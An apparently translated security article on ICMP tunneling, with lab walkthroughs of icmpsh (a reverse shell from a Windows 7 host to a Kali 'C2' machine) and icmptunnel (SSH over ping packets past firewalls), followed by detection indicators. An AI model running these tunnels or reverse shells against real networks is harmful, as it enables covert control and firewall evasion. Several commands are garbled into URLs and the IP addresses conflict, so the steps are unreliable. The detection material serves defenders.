ICMP tunnel traffic characteristics

ICMP protocol

Introduction to ICMP protocol ICMP is the abbreviation for 'Internet Control Message Protocol' (Internet Control Message Protocol). It is a sub-protocol of the TCP/IP protocol suite, used for transmitting control messages between IP hosts and routers. Control messages refer to messages about the network itself, such as whether the network is reachable, whether the host is accessible, and whether the route is available.

Normal ICMP traffic

ICMP tunnel tools

In some network environments, attackers may use the ping command to access remote computers, try to establish an ICMP tunnel, encapsulate TCP/UDP data into ICMP ping packets, and thus pass through firewalls to achieve unrestricted network access.

Typical tools:

icmpsh

powershell icmp

icmptunnel

ptunnel

ICMP tunnel tool - icmpsh

icmpsh tool is simple to use, a cross-platform tool that does not require administrator privileges to run.

icmpsh download address:

https://github.com/inquisb/icmpsh

Environment:

Attacker/C2 channel: 192.168.159.185 (Kali Linux)

Host machine: 192.168.159.158 (Windows 7)

Run icmpsh in master mode (Kali Linux)

Disable ping reply to prevent the kernel from responding to ping packets itself

sysctl -w net.ipv4.icmp_echo_ignore_all=1

https://www.freebuf.com/articles/system/icmpsh_m.py 192.168.1.185 192.168.1.158

Then execute the command on Win7:

icmpsh.exe -t 192.168.217.185

Successfully反弹shell to kali

ICMP tunnel tool - icmptunnel

icmptunnel is a tunnel tool that encapsulates IP traffic into ICMP echo request and reply (ping) packets, which is a semi-hidden way to expand in networks that allow ping and bypass firewalls.

Download address:

https://github.com/jamesbarlow/icmptunnel

Attacker: 192.168.159.169

Target machine: 192.168.159.184

Attacker and target machine execute

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all # Disable icmp reply

Attacker executes

https://www.freebuf.com/articles/system/icmptunnel -s # Listen

Open a new command line window

Add tun0 network interface and allocate tunnel address 10.0.0.1/24 # Add tun0 network interface and assign tunnel address 10.0.0.1/24

Target machine execution

https://www.freebuf.com/articles/system/icmptunnel 192.168.159.169  # Connect to the server

Open a new command line window

ifconfig tun0 10.0.0.2 netmask 255.255.255.0        # Add tun0 network interface, assign tunnel address 10.0.0.2/24

Establish an ssh connection on the attack machine

ssh root@10.0.0.2

Successful connection.

ICMP tunnel traffic characteristics

The total number of data packets in the ICMP session is large.

The amount of data transmitted in a single packet in the tunnel is large.

The request packet and response packet are inconsistent.

Some tunnel tools will display the tun flag.